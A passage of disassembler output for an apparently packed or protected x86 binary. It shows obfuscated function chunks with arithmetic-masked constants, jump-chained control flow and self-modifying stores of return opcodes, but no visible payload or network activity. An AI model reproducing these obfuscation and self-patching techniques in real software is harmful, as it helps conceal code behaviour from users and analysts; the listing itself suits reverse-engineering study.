; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_450017: ; CODE XREF: sub_44D1F0:loc_446D1Dj
add ebx, 895084CEh
jmp loc_4482E9
; END OF FUNCTION CHUNK FOR sub_44D1F0
; =============== S U B R O U T I N E =======================================
sub_450022 proc near ; CODE XREF: sub_405C7A+1Bp
; sub_405C7A+45p ...
call sub_45002D
jmp ds:off_41D16C
sub_450022 endp
; =============== S U B R O U T I N E =======================================
sub_45002D proc near ; CODE XREF: sub_44102C+5557j
; sub_450022p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B81F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004414BE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446588 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004474CD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C62B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044CB07 SIZE 00000005 BYTES
jo loc_446588
pop edx
mov eax, [esp+0]
jmp loc_4414BE
sub_45002D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub edi, 35B0C107h
jmp sub_442252
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_450047: ; CODE XREF: sub_456CBD+144Ej
xor ecx, 0D8DCE92Dh
loc_45004D: ; CODE XREF: sub_456CBD:loc_43D74Dj
mov eax, [ebp-8]
push ebx
mov ebx, eax
jmp loc_4419AB
; END OF FUNCTION CHUNK FOR sub_456CBD
; =============== S U B R O U T I N E =======================================
sub_450058 proc near ; DATA XREF: sub_450FDE-36Eo
push edi
push offset sub_43A956
jmp nullsub_440
sub_450058 endp
; ---------------------------------------------------------------------------
mov ds:off_41D0CC, eax
lea eax, loc_4410B2
mov byte ptr [eax], 0C3h
jmp loc_4410B2
; =============== S U B R O U T I N E =======================================
sub_450077 proc near ; CODE XREF: sub_41A181+3Bp
; sub_450077+5j
; DATA XREF: ...
call sub_450087
jmp ds:off_41D0D0
sub_450077 endp
; ---------------------------------------------------------------------------
loc_450082: ; CODE XREF: ut7h7i2x:00457A89j
jmp locret_456439
; =============== S U B R O U T I N E =======================================
sub_450087 proc near ; CODE XREF: sub_450077p
; ut7h7i2x:loc_454444j ...
push offset loc_449F4C
jmp nullsub_122
sub_450087 endp
; ---------------------------------------------------------------------------
sub eax, 139A7943h
jmp sub_4414E8
; ---------------------------------------------------------------------------
add ebx, eax
jmp sub_446BB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4436F6
loc_4500A3: ; CODE XREF: sub_4436F6:loc_44DFD2j
mov eax, [ebp+8]
mov eax, [eax-10h]
shr eax, 6
call sub_4423C1
; END OF FUNCTION CHUNK FOR sub_4436F6
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_4500B1: ; CODE XREF: sub_44EB88+1Bj
jmp loc_43C25C
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
loc_4500B6: ; CODE XREF: ut7h7i2x:0044E017j
call sub_45341C
mov eax, 0A4C05BA6h
call sub_43AA94
push edi
jmp loc_44C870
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4500CB: ; CODE XREF: sub_43AB62+1A7A5j
ror eax, 3
xor ebx, 0F9EFBC95h
sbb edi, ecx
loc_4500D6: ; CODE XREF: sub_43FBB6:loc_446904j
push 46FCC4FEh
xchg ecx, [esp+4+var_4]
mov eax, ecx
pop ecx
; END OF FUNCTION CHUNK FOR sub_43AB62
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4500E1: ; CODE XREF: sub_439BF8:loc_4426F2j
jmp loc_444777
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443459
loc_4500E6: ; CODE XREF: sub_443459-3260j
add ebx, ds:4000F3h
xor ebx, 8CC90625h
; END OF FUNCTION CHUNK FOR sub_443459
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4500F2: ; CODE XREF: sub_442B3B:loc_43B2AAj
rol ebx, 1Bh
or ebx, 1339D40Dh
xor ebx, 88B1CF7Eh
jmp loc_43F995
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
sub eax, 5EF8A3D3h
push esi
push 1B87A011h
pop esi
and esi, 62F7E02Eh
add esi, 1281E6A0h
xor esi, 49E88CBEh
rol esi, 18h
jmp loc_4482CB
; ---------------------------------------------------------------------------
loc_45012D: ; DATA XREF: sub_4540C1+1Fo
add ebx, 24EBA4Ah
xchg ebx, [esp]
jmp loc_446639
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4447C9
loc_45013B: ; CODE XREF: sub_4447C9+1047Dj
jz loc_455B19
jmp loc_455D6F
; END OF FUNCTION CHUNK FOR sub_4447C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3D0
loc_450146: ; CODE XREF: sub_44A3D0:loc_45097Dj
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_454E20
; END OF FUNCTION CHUNK FOR sub_44A3D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_450151: ; CODE XREF: sub_456E7D-1CA94j
rol esi, 1Fh
xor esi, 477DE651h
add esi, 0CF3B0F4Bh
xchg esi, [esp+8+var_8]
jmp loc_43CA3E
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
loc_450168: ; CODE XREF: ut7h7i2x:0043C9F0j
jz loc_456FEE
jmp loc_4556B6
; ---------------------------------------------------------------------------
loc_450173: ; CODE XREF: ut7h7i2x:004405EEj
shl ecx, 18h
; =============== S U B R O U T I N E =======================================
sub_450176 proc near ; CODE XREF: ut7h7i2x:00444FD3p
xchg esi, [esp+0]
pop esi
push 5AC1FABBh
jmp loc_43C33A
sub_450176 endp
; =============== S U B R O U T I N E =======================================
sub_450184 proc near ; CODE XREF: ut7h7i2x:0043F683j
; sub_44F943-A87Cp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D3CB SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg ecx, [esp-4+arg_0]
jmp loc_43D3CB
sub_450184 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_450190: ; CODE XREF: ut7h7i2x:0044B853j
jns nullsub_247
pushf
sbb eax, 0C64B3E73h
jmp loc_454640
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_4501A2: ; CODE XREF: sub_44C99C:loc_458C1Bj
jz loc_448B0A
jmp loc_45578E
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
loc_4501AD: ; CODE XREF: ut7h7i2x:loc_44A079j
mov eax, edi
pop edi
rol eax, 12h
or eax, 58B93389h
rol eax, 10h
jmp loc_44B7F6
; =============== S U B R O U T I N E =======================================
sub_4501C1 proc near ; CODE XREF: ut7h7i2x:0044ED7Ep
; ut7h7i2x:00455A15j
; FUNCTION CHUNK AT 00454F7C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A40B SIZE 0000001E BYTES
xchg edx, [esp+0]
pop edx
add eax, ebp
add eax, 38CF9204h
jmp loc_454F7C
sub_4501C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
lea eax, sub_44B122
call sub_43F071
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4501DD: ; CODE XREF: sub_4503C3+531Fj
jmp loc_43A447
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_4501E2: ; CODE XREF: sub_45341C-B0EFj
jmp loc_44CBA5
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4501E7: ; CODE XREF: sub_44D1F0-FA0Dj
jmp loc_44D497
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4501EC: ; CODE XREF: sub_439BF8:loc_43C44Dj
test ebp, esi
jmp loc_4512C7
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4501F3: ; CODE XREF: sub_447CBE:loc_44477Cj
jge loc_44EDCA
loc_4501F9: ; CODE XREF: sub_439B67+F13Ej
jmp loc_442D0F
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A5A
loc_4501FE: ; CODE XREF: sub_451A5A-EC04j
jmp loc_43B0EC
; END OF FUNCTION CHUNK FOR sub_451A5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E55D
loc_450203: ; CODE XREF: sub_43E55D+7j
jmp nullsub_487
; END OF FUNCTION CHUNK FOR sub_43E55D
; ---------------------------------------------------------------------------
push ebp
mov esi, ebp
jmp loc_44EDC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45633E
loc_450210: ; CODE XREF: sub_45633E-554Fj
popf
pushf
loc_450212: ; CODE XREF: sub_45633E:loc_447354j
mov eax, 1D403CB1h
; END OF FUNCTION CHUNK FOR sub_45633E
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_450217: ; CODE XREF: sub_447CBE:loc_446C23j
push offset sub_44B909
jmp nullsub_217
; END OF FUNCTION CHUNK FOR sub_447CBE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431E4
loc_450222: ; CODE XREF: sub_4431E4+16j
jmp loc_44F46F
; END OF FUNCTION CHUNK FOR sub_4431E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_450227: ; CODE XREF: sub_43AB62:loc_441A54j
; sub_43AB62+1D7A7j
jmp loc_44340A
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
jmp loc_444ED0
; =============== S U B R O U T I N E =======================================
sub_450231 proc near ; CODE XREF: sub_452B4F:loc_44EF5Fj
; FUNCTION CHUNK AT 0043AECF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044472D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00444B57 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004471C1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00447A6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C057 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F0F0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00451CAC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451FC5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452CA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004542CC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456890 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458E69 SIZE 00000005 BYTES
add esp, 0FFFFFFF0h
call sub_453D8B
push 4F7DB40h
jmp loc_458E69
sub_450231 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_450243: ; CODE XREF: sub_43CA2D:loc_448E4Ej
xor edi, 843E4136h
or edi, 669909E9h
add edi, 84AA7CEh
xchg edi, [esp+0]
jmp sub_45341C
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_45025D: ; CODE XREF: sub_454B2B-11414j
; sub_454B2B:loc_4583FDj
mov eax, [ebp-8]
push offset loc_439734
jmp loc_43AFD1
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_45026A: ; CODE XREF: sub_44602A+AB60j
jnp loc_442F84
cdq
not ecx
loc_450273: ; CODE XREF: sub_44602A:loc_4470AEj
mov eax, [ebp-4]
jmp loc_4578F4
; END OF FUNCTION CHUNK FOR sub_44602A
; =============== S U B R O U T I N E =======================================
sub_45027B proc near ; CODE XREF: ut7h7i2x:loc_44CE99j
; DATA XREF: sub_442B3B+A354o
xchg esi, [esp+0]
jmp sub_44ED9F
sub_45027B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_450283: ; CODE XREF: sub_455060-B4B1j
jnz loc_44B07D
jmp loc_43ED0E
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
jg loc_45225F
jmp sub_442E62
; ---------------------------------------------------------------------------
push edi
mov edi, eax
xchg edi, [esp]
ror eax, 1Ch
push ebx
push 37C1E8EAh
jmp loc_45A0F3
; =============== S U B R O U T I N E =======================================
sub_4502AD proc near ; CODE XREF: ut7h7i2x:loc_44AA9Dp
; ut7h7i2x:004543D7j
xchg esi, [esp+0]
pop esi
xchg eax, edx
call sub_44ED9F
retn
sub_4502AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dword_4502B8 dd 0 ; DATA XREF: ut7h7i2x:loc_443728r
; ut7h7i2x:0044AA97w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_4502BC: ; CODE XREF: sub_447E29+B711j
jmp loc_444081
; END OF FUNCTION CHUNK FOR sub_447E29
; ---------------------------------------------------------------------------
db 26h, 9Ah, 91h
dword_4502C4 dd 0AF8C4DEAh, 8CE28C99h ; DATA XREF: sub_448F31+5o
; sub_44D1F0:loc_4525DAo
; ---------------------------------------------------------------------------
mov dh, 0
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4502CF: ; CODE XREF: sub_43EF73+AFCCj
jmp loc_456B88
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_4502D4: ; CODE XREF: sub_455AD6-14C7Dj
jmp loc_452FB0
; END OF FUNCTION CHUNK FOR sub_455AD6
; ---------------------------------------------------------------------------
locret_4502D9: ; CODE XREF: ut7h7i2x:loc_43BA89j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445CE9
loc_4502DA: ; CODE XREF: sub_445CE9+41D8j
jmp nullsub_204
; END OF FUNCTION CHUNK FOR sub_445CE9
; ---------------------------------------------------------------------------
ja loc_45952F
jmp sub_443A45
; ---------------------------------------------------------------------------
loc_4502EA: ; CODE XREF: ut7h7i2x:004420AFj
jns loc_44EE8D
; =============== S U B R O U T I N E =======================================
sub_4502F0 proc near ; CODE XREF: sub_456CBD+Ap
; FUNCTION CHUNK AT 0043ACD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440CDE SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00456065 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
call sub_440CEC
jmp loc_456065
sub_4502F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-10Ch], 656C6946h
jnz loc_459C6C
loc_45030E: ; CODE XREF: ut7h7i2x:00456ABCj
jmp loc_448362
; ---------------------------------------------------------------------------
loc_450313: ; CODE XREF: ut7h7i2x:loc_4549BAj
or edx, 5316710h
add edx, 22923FE1h
mov [edx], eax
pop edx
retn
; ---------------------------------------------------------------------------
loc_450323: ; CODE XREF: ut7h7i2x:004413AEj
push esi
; =============== S U B R O U T I N E =======================================
sub_450324 proc near ; CODE XREF: sub_454AFE-1Fp
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg ebx, [esp-4+arg_0]
jmp nullsub_125
sub_450324 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449AD9
loc_450330: ; CODE XREF: sub_449AD9:loc_4401FFj
push edi
mov edi, eax
call sub_4416C9
; END OF FUNCTION CHUNK FOR sub_449AD9
; START OF FUNCTION CHUNK FOR sub_43B873
loc_450338: ; CODE XREF: sub_43B873+AC86j
jmp nullsub_225
; END OF FUNCTION CHUNK FOR sub_43B873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E81
loc_45033D: ; CODE XREF: sub_449E81:loc_43F784j
mov byte ptr [eax], 0C3h
jmp loc_443ACE
; END OF FUNCTION CHUNK FOR sub_449E81
; ---------------------------------------------------------------------------
loc_450345: ; CODE XREF: ut7h7i2x:00443AD4j
mov eax, [esp]
push edx
push edi
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_45034A: ; CODE XREF: sub_43CA2D:loc_44309Bj
push 99E2A7B1h
pop edi
sub edi, 829BDEA8h
jmp loc_448E4E
; END OF FUNCTION CHUNK FOR sub_43CA2D
; =============== S U B R O U T I N E =======================================
sub_45035B proc near ; DATA XREF: ut7h7i2x:00459F5Eo
call sub_43AA94
call sub_442A4D
sub_45035B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_450365 proc near ; CODE XREF: sub_454B2B-1530Bp
; ut7h7i2x:00443E11j
; FUNCTION CHUNK AT 00447A72 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
pop edx
lea eax, sub_4497C1
mov byte ptr [eax], 0C3h
jmp loc_447A72
sub_450365 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_450378: ; CODE XREF: sub_4497C1j
call sub_45459E
xchg esi, [ebx]
sub esi, edi
jmp sub_452BE9
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_450386: ; CODE XREF: ut7h7i2x:loc_447832j
; sub_44CE09:loc_44A7C1j
sub eax, 4520CF18h
add eax, 2E93307Fh
push ecx
pushf
push 0C545BEB2h
pop ecx
or ecx, 43B590FDh
test ecx, 1
jmp loc_4599A2
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
locret_4503AB: ; CODE XREF: ut7h7i2x:loc_44720Bj
retn
; =============== S U B R O U T I N E =======================================
sub_4503AC proc near ; CODE XREF: sub_44F040+Dp
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
xchg ecx, [esp-4+arg_0]
call sub_4469B9
call sub_4503C3
retn
sub_4503AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_4503BE: ; CODE XREF: sub_439701+F520j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_439701
; =============== S U B R O U T I N E =======================================
sub_4503C3 proc near ; CODE XREF: sub_450FDE:loc_44479Fj
; sub_4503AC+Cp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004393F5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439D89 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A447 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A5AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AC2E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043AD35 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BA1B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043C364 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004405A7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044115E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00442A93 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443386 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443AA2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443EDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447BE0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004483D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448DA1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00448F68 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449516 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A125 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044ACDA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B945 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EBE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451AAF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451B8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451E65 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452FD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004556D4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457095 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045735A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004576D8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004598E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459915 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459FFD SIZE 0000000B BYTES
push eax
jmp loc_43A5AA
sub_4503C3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4595BE
loc_4503C9: ; CODE XREF: sub_4595BE+Bj
and edi, 0E3C2F814h
or edi, 112AAFA4h
sub edi, 0A101630Eh
add edi, 8F988462h
mov [edi], eax
pop edi
lea eax, nullsub_364
jmp loc_448304
; END OF FUNCTION CHUNK FOR sub_4595BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_4503EF: ; CODE XREF: sub_448321+578Ej
call sub_43AA94
push esi
push 0B208715h
pop esi
add esi, 1A272519h
rol esi, 12h
cmp esi, 0D49E9F1h
jmp loc_45ACEB
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F7F8
loc_45040F: ; CODE XREF: sub_44F7F8:loc_44F80Bj
lea eax, sub_44F22A
mov byte ptr [eax], 0C3h
jmp sub_44F22A
; END OF FUNCTION CHUNK FOR sub_44F7F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F22A
loc_45041D: ; CODE XREF: sub_44F22A:loc_43D8A2j
mov eax, [esp+0]
; END OF FUNCTION CHUNK FOR sub_44F22A
; START OF FUNCTION CHUNK FOR sub_444029
loc_450420: ; CODE XREF: sub_444029+10AF4j
push edx
call sub_43D87A
jmp loc_43F44B
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_45042B: ; CODE XREF: sub_43FFB1:loc_45536Dj
xor eax, eax
push esi
push 13B2B14h
pop esi
jmp loc_458B49
; END OF FUNCTION CHUNK FOR sub_43FFB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_450439: ; CODE XREF: sub_44E2C4:loc_44A993j
and ebx, 0E76C8590h
add ebx, 9D45688Fh
xchg ebx, [esp+0]
jmp loc_454449
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_45044D: ; CODE XREF: sub_43FFB1:loc_44CD40j
xor ecx, 3CB9460Ch
add ecx, 6EE19533h
mov [ecx], eax
pop ecx
jmp loc_45536D
; END OF FUNCTION CHUNK FOR sub_43FFB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_450461: ; CODE XREF: sub_439AE7-778j
jz loc_457BB6
jmp loc_452C4E
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
loc_45046C: ; CODE XREF: ut7h7i2x:00459003j
jbe loc_43DF03
; =============== S U B R O U T I N E =======================================
sub_450472 proc near ; CODE XREF: sub_444EAA:loc_43C018p
; FUNCTION CHUNK AT 0043BE08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA24 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452E8C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004576E1 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
cmp dword ptr [ebp-4], 0
jz loc_44B4CE
jmp loc_4576E1
sub_450472 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_450485: ; CODE XREF: ut7h7i2x:loc_456C75j
add edx, 7EDDCE7Bh
xchg edx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_450493: ; CODE XREF: sub_455111-AA2Fj
; sub_4549F0-4FE8j
xor edx, 0EB9094D6h
add edx, ebp
add edx, 0CA73D4A4h
mov edx, [edx]
imul byte ptr [edx]
jmp loc_443C87
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
loc_4504AA: ; CODE XREF: ut7h7i2x:004591C9j
adc edx, 0F08D6D3Ah
jmp loc_442912
; ---------------------------------------------------------------------------
loc_4504B5: ; DATA XREF: ut7h7i2x:0044327Ao
xchg ebx, [esp]
call sub_446F62
loc_4504BD: ; CODE XREF: ut7h7i2x:00457075j
jmp loc_44164E
; ---------------------------------------------------------------------------
loc_4504C2: ; CODE XREF: ut7h7i2x:00456F55j
jmp loc_43A139
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_4504C7: ; CODE XREF: sub_455AD6-2B21j
jmp nullsub_501
; END OF FUNCTION CHUNK FOR sub_455AD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_4504CC: ; CODE XREF: sub_44C852+6j
jmp loc_44FB50
; END OF FUNCTION CHUNK FOR sub_44C852
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AB7D
loc_4504D2: ; CODE XREF: sub_45AB7D+1Aj
jmp loc_45188B
; END OF FUNCTION CHUNK FOR sub_45AB7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4561CA
loc_4504D7: ; CODE XREF: sub_4561CA-12CA8j
jmp loc_454EB4
; END OF FUNCTION CHUNK FOR sub_4561CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4504DC: ; CODE XREF: sub_439BD1+4A70j
jmp loc_440372
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_4504E1: ; CODE XREF: ut7h7i2x:0043D24Dj
jmp locret_457F41
; ---------------------------------------------------------------------------
loc_4504E6: ; CODE XREF: ut7h7i2x:00452603j
jnz loc_443871
; =============== S U B R O U T I N E =======================================
sub_4504EC proc near ; CODE XREF: ut7h7i2x:0045AA2Cp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D052 SIZE 0000000D BYTES
xchg edi, [esp+4+var_4]
pop edi
push ebp
mov ebp, ecx
jmp loc_43D052
sub_4504EC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4504F8: ; CODE XREF: ut7h7i2x:004538F9j
xor ecx, 0C0000340h
call sub_44D77D
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_450503: ; CODE XREF: sub_43C0DA+129A4j
jmp loc_45A377
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_450508: ; CODE XREF: sub_44D1F0-E07Ej
jmp nullsub_316
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_45050D: ; CODE XREF: sub_452B14+581Dj
push 0B139646Bh
pop ebx
rol ebx, 1
add ebx, 165C2CFCh
jnz loc_43E89C
xor edx, 6C072DCCh
sbb eax, ebx
jmp loc_45A3E9
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_45052E: ; CODE XREF: ut7h7i2x:0043EBF2j
; sub_4431FF+2875j
popf
loc_45052F: ; CODE XREF: ut7h7i2x:loc_4442A2j
jmp loc_447B84
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_450534: ; CODE XREF: sub_445AD1-1499j
jnz loc_43D1AC
loc_45053A: ; CODE XREF: sub_455F83+5j
jmp loc_44519B
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
push edx
push 42DFF67Ch
jmp loc_43D1A9
; ---------------------------------------------------------------------------
loc_45054A: ; CODE XREF: ut7h7i2x:loc_4550D3j
sub esi, 0EA244FEEh
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_450550: ; CODE XREF: sub_44E5AB:loc_44A1F1j
xor esi, 78D38701h
sub esi, 6D8B3A5Ch
add esi, 597BBFABh
mov [esi], eax
pop esi
lea eax, sub_448321
mov byte ptr [eax], 0C3h
jmp sub_448321
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
or ebx, edx
jmp loc_44648E
; ---------------------------------------------------------------------------
loc_45057A: ; CODE XREF: ut7h7i2x:00439A8Cj
jl loc_459088
or esi, ebp
or edx, ecx
